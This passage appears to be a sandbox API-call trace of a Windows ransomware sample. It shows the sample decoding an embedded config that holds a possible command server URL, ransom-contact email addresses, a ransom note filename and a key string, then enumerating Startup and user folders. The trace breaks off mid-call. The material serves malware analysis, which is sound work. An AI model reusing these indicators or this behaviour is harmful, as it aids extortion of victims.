[0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13282bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0093.947] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13282bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0093.947] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0093.947] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x132f48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0093.947] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0093.948] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.948] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13282bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0093.948] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0093.948] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0093.948] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x132f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0093.948] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0093.948] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0093.948] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x132f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0093.948] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0093.948] GetThreadLocale () returned 0x409 [0093.948] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0093.948] GetCurrentThreadId () returned 0xaf0 [0093.948] GetCurrentThreadId () returned 0xaf0 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0093.948] GetThreadLocale () returned 0x409 [0093.948] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0093.948] GetThreadLocale () returned 0x409 [0093.948] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0093.948] GetCurrentThreadId () returned 0xaf0 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0093.949] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0093.955] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0093.960] GetACP () returned 0x4e4 [0093.960] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0093.960] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe")) returned 0x3a [0093.960] GetTickCount () returned 0x22c8b [0093.960] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=15074892729) returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6d\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x64\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x52\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x77\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4d\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x45\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x39\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x32\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x58\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x74\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x56\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x37\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0093.960] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0093.960] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0093.960] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0093.960] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0093.960] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0093.960] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0093.960] LockResource (hResData=0x50d55c) returned 0x50d55c [0093.961] FreeResource (hResData=0x50d55c) returned 0 [0093.961] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.961] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.961] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.961] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.961] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0093.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361c20, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361c20, cbMultiByte=38, lpWideCharStr=0x133de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.961] FreeResource (hResData=0x50d64c) returned 0 [0093.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1361c24, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.961] GetCurrentThreadId () returned 0xaf0 [0093.961] GetCurrentThreadId () returned 0xaf0 [0093.961] GetCurrentThreadId () returned 0xaf0 [0093.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x130a1a8, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0093.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x130a1a8, cbMultiByte=239, lpWideCharStr=0x130404c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0093.961] GetCurrentThreadId () returned 0xaf0 [0093.961] GetCurrentThreadId () returned 0xaf0 [0093.961] GetCurrentThreadId () returned 0xaf0 [0093.961] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.961] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x12faccc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0093.961] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x12faccc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0093.961] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0093.963] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0093.964] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0093.964] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0093.965] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0093.966] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0093.967] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0093.967] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0093.976] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0093.977] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x12faccc, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0093.977] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x12faccc, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0093.977] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x12faccc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0093.977] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x12faccc, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0093.977] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 